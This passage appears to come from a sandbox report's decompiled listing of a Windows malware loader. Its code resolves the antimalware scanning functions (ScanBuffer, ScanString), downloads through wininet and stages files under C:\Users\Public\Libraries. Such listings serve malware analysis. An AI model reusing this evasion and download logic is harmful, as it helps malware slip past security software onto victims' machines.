                                                                                                				intOrPtr _t3434;
                                                                                                				intOrPtr _t3435;
                                                                                                				intOrPtr _t3436;
                                                                                                				intOrPtr _t3437;
                                                                                                				intOrPtr _t3438;
                                                                                                				intOrPtr _t3440;
                                                                                                				intOrPtr _t3441;
                                                                                                				intOrPtr _t3443;
                                                                                                				intOrPtr _t3444;
                                                                                                				intOrPtr _t3445;
                                                                                                				intOrPtr _t3446;
                                                                                                				intOrPtr _t3447;
                                                                                                				intOrPtr _t3448;
                                                                                                				intOrPtr _t3449;
                                                                                                				intOrPtr _t3450;
                                                                                                				intOrPtr _t3451;
                                                                                                				intOrPtr _t3452;
                                                                                                				intOrPtr _t3453;
                                                                                                				intOrPtr _t3454;
                                                                                                				intOrPtr _t3455;
                                                                                                				intOrPtr _t3456;
                                                                                                				intOrPtr _t3457;
                                                                                                				intOrPtr _t3458;
                                                                                                				intOrPtr _t3459;
                                                                                                				intOrPtr _t3460;
                                                                                                				intOrPtr _t3461;
                                                                                                				intOrPtr _t3462;
                                                                                                				intOrPtr _t3463;
                                                                                                				intOrPtr _t3464;
                                                                                                				intOrPtr _t3465;
                                                                                                				intOrPtr _t3466;
                                                                                                				intOrPtr _t3467;
                                                                                                				intOrPtr _t3468;
                                                                                                				intOrPtr _t3469;
                                                                                                				intOrPtr _t3470;
                                                                                                				intOrPtr _t3471;
                                                                                                				intOrPtr _t3472;
                                                                                                				intOrPtr _t3473;
                                                                                                				intOrPtr _t3474;
                                                                                                				intOrPtr _t3475;
                                                                                                				intOrPtr _t3476;
                                                                                                				intOrPtr _t3477;
                                                                                                				intOrPtr _t3478;
                                                                                                				intOrPtr _t3479;
                                                                                                				intOrPtr _t3480;
                                                                                                				intOrPtr _t3482;
                                                                                                				intOrPtr _t3483;
                                                                                                				intOrPtr _t3484;
                                                                                                				intOrPtr _t3485;
                                                                                                				intOrPtr _t3490;
                                                                                                				intOrPtr _t3491;
                                                                                                				intOrPtr _t3492;
                                                                                                				intOrPtr _t3493;
                                                                                                				intOrPtr _t3494;
                                                                                                				intOrPtr _t3495;
                                                                                                				intOrPtr _t3496;
                                                                                                				intOrPtr _t3497;
                                                                                                				intOrPtr _t3498;
                                                                                                				intOrPtr _t3499;
                                                                                                				intOrPtr _t3500;
                                                                                                				intOrPtr _t3501;
                                                                                                				intOrPtr _t3502;
                                                                                                				intOrPtr _t3503;
                                                                                                				intOrPtr _t3504;
                                                                                                				intOrPtr _t3505;
                                                                                                				intOrPtr _t3507;
                                                                                                				intOrPtr _t3508;
                                                                                                				intOrPtr _t3509;
                                                                                                				intOrPtr _t3510;
                                                                                                				intOrPtr _t3520;
                                                                                                				intOrPtr _t3521;
                                                                                                				intOrPtr _t3522;
                                                                                                				intOrPtr _t3523;
                                                                                                				intOrPtr _t3524;
                                                                                                				intOrPtr _t3525;
                                                                                                				intOrPtr _t3526;
                                                                                                				intOrPtr _t3528;
                                                                                                				void* _t3534;
                                                                                                				void* _t3539;
                                                                                                				void* _t3544;
                                                                                                				void* _t3549;
                                                                                                				void* _t3554;
                                                                                                				void* _t3559;
                                                                                                				void* _t3566;
                                                                                                				void* _t3572;
                                                                                                				void* _t3578;
                                                                                                				void* _t3583;
                                                                                                				void* _t3591;
                                                                                                				void* _t3597;
                                                                                                				void* _t3602;
                                                                                                				void* _t3607;
                                                                                                				void* _t3619;
                                                                                                				void* _t3626;
                                                                                                				void* _t3633;
                                                                                                				void* _t3638;
                                                                                                				void* _t3644;
                                                                                                				void* _t3649;
                                                                                                				void* _t3654;
                                                                                                				void* _t3659;
                                                                                                				void* _t3664;
                                                                                                				void* _t3670;
                                                                                                				void* _t3675;
                                                                                                				intOrPtr _t3676;
                                                                                                				intOrPtr _t3687;
                                                                                                				intOrPtr _t3689;
	void* _t3697;
	void* _t3704;
	void* _t3711;
	intOrPtr _t3712;
	void* _t3741;
	void* _t3746;
	void* _t3751;
	void* _t3756;
	void* _t3761;
	void* _t3769;
	void* _t3774;
	void* _t3779;
	void* _t3784;
	void* _t3790;
	void* _t3795;
	void* _t3800;
	void* _t3805;
	intOrPtr _t3806;
	void* _t3812;
	void* _t3817;
	void* _t3824;
	void* _t3829;
	void* _t3837;
	void* _t3842;
	void* _t3847;
	void* _t3853;
	void* _t3858;
	void* _t3864;
	void* _t3869;
	void* _t3875;
	void* _t3880;
	void* _t3886;
	void* _t3891;
	void* _t3896;
	void* _t3899;
	void* _t3902;
	void* _t3907;
	void* _t3910;
	void* _t3913;
	void* _t3918;
	void* _t3923;
	void* _t3928;
	void* _t3933;
	void* _t3937;
	void* _t3942;
	void* _t3945;
	void* _t3948;
	void* _t3951;
	void* _t3956;
	void* _t3959;
	void* _t3962;
	void* _t3965;
	void* _t3968;
	void* _t3971;
	void* _t3974;
	void* _t3977;
	void* _t3980;
	void* _t3983;
	void* _t3986;
	void* _t3989;
	void* _t3992;
	void* _t3997;
	void* _t4000;
	void* _t4003;
	void* _t4006;
	void* _t4009;
	void* _t4012;
	void* _t4015;
	void* _t4018;
	void* _t4026;
	void* _t4034;
	void* _t4044;
	void* _t4049;
	void* _t4055;
	void* _t4060;
	void* _t4067;
	void* _t4072;
	void* _t4077;
	void* _t4082;
	void* _t4087;
	void* _t4092;
	void* _t4097;
	void* _t4102;
	void* _t4107;
	void* _t4113;
	void* _t4118;
	void* _t4127;
	void* _t4132;
	intOrPtr _t4139;
	void* _t4147;
	void* _t4152;
	void* _t4157;
	void* _t4162;
	void* _t4169;
	void* _t4174;
	void* _t4179;
	void* _t4184;
	void* _t4189;
	void* _t4194;
	void* _t4199;
	void* _t4204;
	void* _t4211;
	void* _t4216;
	void* _t4220;
	void* _t4225;
	void* _t4230;
	void* _t4237;
	void* _t4242;
	void* _t4248;
	void* _t4253;
	intOrPtr _t4267;
	void* _t4272;
	void* _t4277;
	void* _t4282;
	void* _t4290;
	void* _t4293;
	void* _t4296;
	void* _t4299;
	void* _t4304;
	void* _t4309;
	void* _t4314;
	void* _t4319;
	intOrPtr _t4320;
	void* _t4328;
	intOrPtr _t4329;
	void* _t4332;
	intOrPtr _t4336;
	intOrPtr _t4337;
	intOrPtr* _t4345;
	void* _t4354;
                                                                                                
	_t4354 = __fp0;
	_t4332 = __edi;
	_t3375 = __ebx;
	_t4336 = _t4337;
	_t3383 = 0x16a;
	goto L1;
	L12:
	_t1321 =  *0x21949d8; // 0x3d3c508
	E02174DC4(_t1321, _t3376 - 4, 1, 0x21949c4);
	_push(0x218e77c);
	_push( *0x2194bb0);
	_push("ScanBuffer");
	E02174C24();
	E02174A98( &_v196, E02174D64(_v200));
	_push(_v196);
	_t3397 =  *0x2194bb0; // 0x3e01b38
	E02174BB0( &_v208, _t3397, 0x218e77c);
	E02174A98( &_v204, E02174D64(_v208));
	_pop(_t3591); // executed
	E02183690(_v204, _t3376, _t3591, 0x2194b88);
	_t1337 =  *0x21949c4; // 0x3df33a0
	E02174A98( &_v212, E02174D64(_t1337));
	_t1342 = E021780F8(_v212);
	_t4343 = _t1342;
	if(_t1342 == 0) {
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("Initialize");
		E02174C24();
		E02174A98( &_v264, E02174D64(_v268));
		_push(_v264);
		_t3398 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v276, _t3398, 0x218e77c);
		E02174A98( &_v272, E02174D64(_v276));
		_pop(_t3597); // executed
		E02183690(_v272, _t3376, _t3597, 0x2194b88); // executed
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("OpenSession");
		E02174C24();
		E02174A98( &_v280, E02174D64(_v284));
		_push(_v280);
		_t3399 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v292, _t3399, 0x218e77c);
		E02174A98( &_v288, E02174D64(_v292));
		_pop(_t3602); // executed
		E02183690(_v288, _t3376, _t3602, 0x2194b88); // executed
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("ScanBuffer");
		E02174C24();
		E02174A98( &_v296, E02174D64(_v300));
		_push(_v296);
		_t3400 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v308, _t3400, 0x218e77c);
		E02174A98( &_v304, E02174D64(_v308));
		_pop(_t3607); // executed
		E02183690(_v304, _t3376, _t3607, 0x2194b88); // executed
		E02172FC4(E02177D88(0x218e810, __eflags),  &_v312);
		E02173300(0x21949dc, _v312, __eflags, _t4354);
		_t1390 =  *0x2190e88; // 0x219000c
		 *_t1390 = 0;
		E02172D28(E021736BC());
		E02174F90(0x2194b80, E02172D28(E021734CC(0x21949dc)));
		_t1399 =  *0x2194b80; // 0x7fdf0018
		_v192 = _t1399;
		_t3377 = _v192;
		__eflags = _t3377;
		if(_t3377 != 0) {
			_t3380 = _t3377 - 4;
			__eflags = _t3380;
			_t3377 =  *_t3380;
		}
		E02174DBC(0x2194b80);
		_t1403 = E02173454(0); // executed
		E02172D28(_t1403);
		E02172D28(E02173474(0x21949dc));
		_t1408 =  *0x2194b80; // 0x7fdf0018, executed
		E0218860C(_t1408, _t3377,  &_v316, 0x218e81c, _t4332, 0x2194b88); // executed
		_t3403 =  *0x21885d4; // 0x21885d8
		E02175A4C(0x2194b88, _t3403, _v316);
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("OpenSession");
		E02174C24();
		E02174A98( &_v320, E02174D64(_v324));
		_push(_v320);
		_t3404 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v332, _t3404, 0x218e77c);
		E02174A98( &_v328, E02174D64(_v332));
		_pop(_t3619); // executed
		E02183690(_v328, _t3377, _t3619, 0x2194b88); // executed
		E021748F4(0x2194b28,  *((intOrPtr*)( *0x2194b88 + 4)));
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("OpenSession");
		E02174C24();
		E02174A98( &_v336, E02174D64(_v340));
		_push(_v336);
		_t3405 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v348, _t3405, 0x218e77c);
		E02174A98( &_v344, E02174D64(_v348));
		_pop(_t3626); // executed
		E02183690(_v344, _t3377, _t3626, 0x2194b88); // executed
		_t1443 = E02177D88(0x218e82c, __eflags);
		_t1444 =  *0x2194b28; // 0x3dcf378
		E02188E78(_t1444, _t3377,  &_v352, _t1443, 0x2194b88);
		E021748F4(0x2194bb4, _v352);
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("ScanString");
		E02174C24();
		E02174A98( &_v356, E02174D64(_v360));
		_push(_v356);
		_t3407 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v368, _t3407, 0x218e77c);
		E02174A98( &_v364, E02174D64(_v368));
		_pop(_t3633); // executed
		E02183690(_v364, _t3377, _t3633, 0x2194b88); // executed
		_push(0x218e77c);
		_push( *0x2194bb0);
		_push("UacScan");
		E02174C24();
		E02174A98( &_v372, E02174D64(_v376));
		_push(_v372);
		_t3408 =  *0x2194bb0; // 0x3e01b38
		E02174BB0( &_v384, _t3408, 0x218e77c);
		E02174A98( &_v380, E02174D64(_v384));
		_pop(_t3638); // executed
		E02183690(_v380, _t3377, _t3638, 0x2194b88); // executed
		_t1476 =  *0x2194bb4; // 0x3dc8048
		__eflags = E02188BBC(_t1476, 0x218e848, __eflags);
		if(__eflags != 0) {
			_t3247 =  *0x2194bb4; // 0x3dc8048, executed
			E02188CBC(_t3247, _t3377, _t3408,  &_v388, 0x2194b88, __eflags); // executed
			E021748F4(0x2194b7c, _v388);
			E02174A98( &_v392, "InternetOpena");
			_push(_v392);
			E02174A98( &_v396, "wininet");
			_pop(_t4290);
			E02183690(_v396, _t3377, _t4290, 0x2194b88);
			E02174A98( &_v400, "InternetOpenUrl");
			_push(_v400);
			E02174A98( &_v404, "wininet");
			_pop(_t4293);
			E02183690(_v404, _t3377, _t4293, 0x2194b88);
			E02174A98( &_v408, "InternetReadFile");
			_push(_v408);
			E02174A98( &_v412, "wininet");
			_pop(_t4296);
			E02183690(_v412, _t3377, _t4296, 0x2194b88);
			E02174A98( &_v416, "InternetCloseHandle");
			_push(_v416);
			E02174A98( &_v420, "wininet");
			_pop(_t4299);
			E02183690(_v420, _t3377, _t4299, 0x2194b88);
			_push(0x218e77c);
			_push( *0x2194bb0);
			_push("OpenSession");
			E02174C24();
			E02174A98( &_v424, E02174D64(_v428));
			_push(_v424);
			_t3523 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v436, _t3523, 0x218e77c);
                                                                                                						E02174A98( &_v432, E02174D64(_v436));
                                                                                                						_pop(_t4304); // executed
                                                                                                						E02183690(_v432, _t3377, _t4304, 0x2194b88); // executed
                                                                                                					}
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v440, E02174D64(_v444));
                                                                                                					_push(_v440);
                                                                                                					_t3409 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v452, _t3409, 0x218e77c);
                                                                                                					E02174A98( &_v448, E02174D64(_v452));
                                                                                                					_pop(_t3644); // executed
                                                                                                					E02183690(_v448, _t3377, _t3644, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v456, E02174D64(_v460));
                                                                                                					_push(_v456);
                                                                                                					_t3410 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v468, _t3410, 0x218e77c);
                                                                                                					E02174A98( &_v464, E02174D64(_v468));
                                                                                                					_pop(_t3649); // executed
                                                                                                					E02183690(_v464, _t3377, _t3649, 0x2194b88); // executed
                                                                                                				} else {
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v216, E02174D64(_v220));
                                                                                                					_push(_v216);
                                                                                                					_t3524 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v228, _t3524, 0x218e77c);
                                                                                                					E02174A98( &_v224, E02174D64(_v228));
                                                                                                					_pop(_t4309);
                                                                                                					E02183690(_v224, _t3376, _t4309, 0x2194b88);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v232, E02174D64(_v236));
                                                                                                					_push(_v232);
                                                                                                					_t3525 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v244, _t3525, 0x218e77c);
                                                                                                					E02174A98( &_v240, E02174D64(_v244));
                                                                                                					_pop(_t4314);
                                                                                                					E02183690(_v240, _t3376, _t4314, 0x2194b88);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v248, E02174D64(_v252));
                                                                                                					_push(_v248);
                                                                                                					_t3526 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v260, _t3526, 0x218e77c);
                                                                                                					E02174A98( &_v256, E02174D64(_v260));
                                                                                                					_pop(_t4319);
                                                                                                					E02183690(_v256, _t3376, _t4319, 0x2194b88);
                                                                                                					_t4320 =  *0x21949c4; // 0x3df33a0
                                                                                                					E02173300(0x21949dc, _t4320, _t4343, _t4354);
                                                                                                					_t3337 =  *0x2190e88; // 0x219000c
                                                                                                					 *_t3337 = 0;
                                                                                                					E02172D28(E021736BC());
                                                                                                					E02174F90(0x2194b7c, E02172D28(E021734CC(0x21949dc)));
                                                                                                					_t3346 =  *0x2194b7c; // 0x3d65538
                                                                                                					_v192 = _t3346;
                                                                                                					_t3377 = _v192;
                                                                                                					if(_t3377 != 0) {
                                                                                                						_t3381 = _t3377 - 4;
                                                                                                						_t4345 = _t3381;
                                                                                                						_t3377 =  *_t3381;
                                                                                                					}
                                                                                                					E02174DBC(0x2194b7c);
                                                                                                					E02172D28(E02173454(0));
                                                                                                					E02172D28(E02173474(0x21949dc));
                                                                                                				}
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("Initialize");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v472, E02174D64(_v476));
                                                                                                				_push(_v472);
                                                                                                				_t3411 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0( &_v484, _t3411, 0x218e77c);
                                                                                                				E02174A98( &_v480, E02174D64(_v484));
                                                                                                				_pop(_t3654); // executed
                                                                                                				E02183690(_v480, _t3377, _t3654, 0x2194b88); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v488, E02174D64(_v492));
                                                                                                				_push(_v488);
                                                                                                				_t3412 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0( &_v500, _t3412, 0x218e77c);
                                                                                                				E02174A98( &_v496, E02174D64(_v500));
                                                                                                				_pop(_t3659); // executed
                                                                                                				E02183690(_v496, _t3377, _t3659, 0x2194b88); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v504, E02174D64(_v508));
                                                                                                				_push(_v504);
                                                                                                				_t3413 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0( &_v516, _t3413, 0x218e77c);
                                                                                                				E02174A98( &_v512, E02174D64(_v516));
                                                                                                				_pop(_t3664); // executed
                                                                                                				E02183690(_v512, _t3377, _t3664, 0x2194b88); // executed
                                                                                                				E021748F4(0x2194b40, 0x218e82c);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v520, E02174D64(_v524));
                                                                                                				_push(_v520);
                                                                                                				_t3414 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0( &_v532, _t3414, 0x218e77c);
                                                                                                				E02174A98( &_v528, E02174D64(_v532));
                                                                                                				_pop(_t3670); // executed
                                                                                                				E02183690(_v528, _t3377, _t3670, 0x2194b88); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v536, E02174D64(_v540));
                                                                                                				_push(_v536);
                                                                                                				_t3415 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0( &_v548, _t3415, 0x218e77c);
                                                                                                				E02174A98( &_v544, E02174D64(_v548));
                                                                                                				_pop(_t3675); // executed
                                                                                                				E02183690(_v544, _t3377, _t3675, 0x2194b88);
                                                                                                				_t1578 =  *0x2194b7c; // 0x3d65538
                                                                                                				_t1579 = E02188BF8(_t1578, _t3377, _t4345);
                                                                                                				_t4346 = (_t1579 ^ 0x00000001) - 1;
                                                                                                				if((_t1579 ^ 0x00000001) != 1) {
                                                                                                					L62:
                                                                                                					__eflags = 0;
                                                                                                					_pop(_t3676);
                                                                                                					 *[fs:eax] = _t3676;
                                                                                                					_push(E0218E74C);
                                                                                                					E021748C4( &_v2900, 0x62);
                                                                                                					E021748C4( &_v2500, 2);
                                                                                                					E021748C4( &_v2508, 2);
                                                                                                					E021748C4( &_v2492, 0x61);
                                                                                                					E021748A0( &_v2092);
                                                                                                					E021748C4( &_v2104, 3);
                                                                                                					E021748C4( &_v1832, 0x5e);
                                                                                                					E021748C4( &_v1452, 3);
                                                                                                					E021748A0( &_v1456);
                                                                                                					E021748C4( &_v1440, 0x63);
                                                                                                					E021748C4( &_v1044, 0x64);
                                                                                                					E021748C4( &_v644, 9);
                                                                                                					_t3687 =  *0x21885d4; // 0x21885d8
                                                                                                					E02175A10( &_v608, _t3687);
                                                                                                					E021748C4( &_v604, 0x48);
                                                                                                					_t3689 =  *0x21885d4; // 0x21885d8
                                                                                                					E02175A10( &_v316, _t3689);
                                                                                                					E021748C4( &_v312, 0x11);
                                                                                                					E021748C4( &_v244, 0xd);
                                                                                                					return E021748C4( &_v188, 0x2e);
                                                                                                				} else {
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v552, E02174D64(_v556));
                                                                                                					_push(_v552);
                                                                                                					_t3418 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v564, _t3418, 0x218e77c);
                                                                                                					E02174A98( &_v560, E02174D64(_v564));
                                                                                                					_pop(_t3697); // executed
                                                                                                					E02183690(_v560, _t3377, _t3697, 0x2194b88);
                                                                                                					_t1632 =  *0x2194b40; // 0x3e01b78
                                                                                                					_t1633 = E02177D88(_t1632, _t4346);
                                                                                                					_t1634 =  *0x2194b7c; // 0x3d65538
                                                                                                					E02188F20(_t1634, _t3377,  &_v568, _t1633, _t4332, 0x2194b88);
                                                                                                					E021748F4(0x21949d8, _v568);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v572, E02174D64(_v576));
                                                                                                					_push(_v572);
                                                                                                					_t3420 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v584, _t3420, 0x218e77c);
                                                                                                					E02174A98( &_v580, E02174D64(_v584));
                                                                                                					_pop(_t3704); // executed
                                                                                                					E02183690(_v580, _t3377, _t3704, 0x2194b88); // executed
                                                                                                					_t1652 =  *0x21949d8; // 0x3d3c508
                                                                                                					E02188C58(_t1652, _t3420,  &_v588);
                                                                                                					E021748F4(0x21949d8, _v588);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanString");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v592, E02174D64(_v596));
                                                                                                					_push(_v592);
                                                                                                					_t3421 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v604, _t3421, 0x218e77c);
                                                                                                					E02174A98( &_v600, E02174D64(_v604));
                                                                                                					_pop(_t3711); // executed
                                                                                                					E02183690(_v600, _t3377, _t3711, 0x2194b88); // executed
                                                                                                					_t3712 =  *0x2190ac8; // 0x7d8c0c
                                                                                                					E02174B28( &_v612, _t3712);
                                                                                                					_t1672 =  *0x21949d8; // 0x3d3c508
                                                                                                					E0218860C(_t1672, _t3377,  &_v608, _v612, _t4332, 0x2194b88);
                                                                                                					_t3423 =  *0x21885d4; // 0x21885d8
                                                                                                					E02175A4C(0x2194b88, _t3423, _v608);
                                                                                                					E021748F4(0x2194bdc,  *((intOrPtr*)( *0x2194b88 + 4)));
                                                                                                					E021748F4(0x2194bd4,  *((intOrPtr*)( *0x2194b88 + 8)));
                                                                                                					E021748F4(0x2194b74,  *((intOrPtr*)( *0x2194b88 + 0xc)));
                                                                                                					E021748F4(0x2194bd8,  *((intOrPtr*)( *0x2194b88 + 0x10)));
                                                                                                					E021748F4(0x2194bbc,  *((intOrPtr*)( *0x2194b88 + 0x14)));
                                                                                                					E021748F4(0x2194bc0,  *((intOrPtr*)( *0x2194b88 + 0x18)));
                                                                                                					E021748F4(0x2194bc4,  *((intOrPtr*)( *0x2194b88 + 0x1c)));
                                                                                                					E021748F4(0x2194bc8,  *((intOrPtr*)( *0x2194b88 + 0x20)));
                                                                                                					E021748F4(0x2194bcc,  *((intOrPtr*)( *0x2194b88 + 0x24)));
                                                                                                					E021748F4(0x2194b38,  *((intOrPtr*)( *0x2194b88 + 0x28)));
                                                                                                					E021748F4(0x2194b3c,  *((intOrPtr*)( *0x2194b88 + 0x2c)));
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v616, E02174D64(_v620));
                                                                                                					_push(_v616);
                                                                                                					_t3424 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v628, _t3424, 0x218e77c);
                                                                                                					E02174A98( &_v624, E02174D64(_v628));
                                                                                                					_pop(_t3741); // executed
                                                                                                					E02183690(_v624, _t3377, _t3741, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v632, E02174D64(_v636));
                                                                                                					_push(_v632);
                                                                                                					_t3425 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v644, _t3425, 0x218e77c);
                                                                                                					E02174A98( &_v640, E02174D64(_v644));
                                                                                                					_pop(_t3746); // executed
                                                                                                					E02183690(_v640, _t3377, _t3746, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v648, E02174D64(_v652));
                                                                                                					_push(_v648);
                                                                                                					_t3426 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v660, _t3426, 0x218e77c);
                                                                                                					E02174A98( &_v656, E02174D64(_v660));
                                                                                                					_pop(_t3751); // executed
                                                                                                					E02183690(_v656, _t3377, _t3751, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v664, E02174D64(_v668));
                                                                                                					_push(_v664);
                                                                                                					_t3427 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v676, _t3427, 0x218e77c);
                                                                                                					E02174A98( &_v672, E02174D64(_v676));
                                                                                                					_pop(_t3756); // executed
                                                                                                					E02183690(_v672, _t3377, _t3756, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanString");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v680, E02174D64(_v684));
                                                                                                					_push(_v680);
                                                                                                					_t3428 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v692, _t3428, 0x218e77c);
                                                                                                					E02174A98( &_v688, E02174D64(_v692));
                                                                                                					_pop(_t3761); // executed
                                                                                                					E02183690(_v688, _t3377, _t3761, 0x2194b88); // executed
                                                                                                					E021748F4(0x2194b84, "C:\\Users\\Public\\Libraries");
                                                                                                					_t1770 =  *0x2194b84; // 0x3de4d80
                                                                                                					E02174A98( &_v696, E02174D64(_t1770));
                                                                                                					if(E0217811C(_v696) == 0) {
                                                                                                						_t3241 =  *0x2194b84; // 0x3de4d80
                                                                                                						E02174A98( &_v700, E02174D64(_t3241));
                                                                                                						E021782B0(_v700);
                                                                                                					}
                                                                                                					_t1776 =  *0x2194bd4; // 0x3e09388
                                                                                                					_v192 = _t1776;
                                                                                                					_t3378 = _v192;
                                                                                                					if(_t3378 != 0) {
                                                                                                						_t3378 =  *((intOrPtr*)(_t3378 - 4));
                                                                                                					}
                                                                                                					_t1777 =  *0x2194bd4; // 0x3e09388
                                                                                                					E02174DC4(_t1777, _t3378 != 3, 1, 0x2194bd4);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v704, E02174D64(_v708));
                                                                                                					_push(_v704);
                                                                                                					_t3431 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v716, _t3431, 0x218e77c);
                                                                                                					E02174A98( &_v712, E02174D64(_v716));
                                                                                                					_pop(_t3769); // executed
                                                                                                					E02183690(_v712, _t3378, _t3769, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v720, E02174D64(_v724));
                                                                                                					_push(_v720);
                                                                                                					_t3432 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v732, _t3432, 0x218e77c);
                                                                                                					E02174A98( &_v728, E02174D64(_v732));
                                                                                                					_pop(_t3774); // executed
                                                                                                					E02183690(_v728, _t3378, _t3774, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v736, E02174D64(_v740));
                                                                                                					_push(_v736);
                                                                                                					_t3433 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v748, _t3433, 0x218e77c);
                                                                                                					E02174A98( &_v744, E02174D64(_v748));
                                                                                                					_pop(_t3779); // executed
                                                                                                					E02183690(_v744, _t3378, _t3779, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanString");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v752, E02174D64(_v756));
                                                                                                					_push(_v752);
                                                                                                					_t3434 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v764, _t3434, 0x218e77c);
                                                                                                					E02174A98( &_v760, E02174D64(_v764));
                                                                                                					_pop(_t3784); // executed
                                                                                                					E02183690(_v760, _t3378, _t3784, 0x2194b88);
                                                                                                					_t1835 =  *0x2194bbc; // 0x3e01ba8
                                                                                                					E02174CB0(_t1835, 0x218e8cc);
                                                                                                					if(_t3378 != 3) {
                                                                                                						L32:
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("Initialize");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1240, E02174D64(_v1244));
                                                                                                						_push(_v1240);
                                                                                                						_t3435 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1252, _t3435, 0x218e77c);
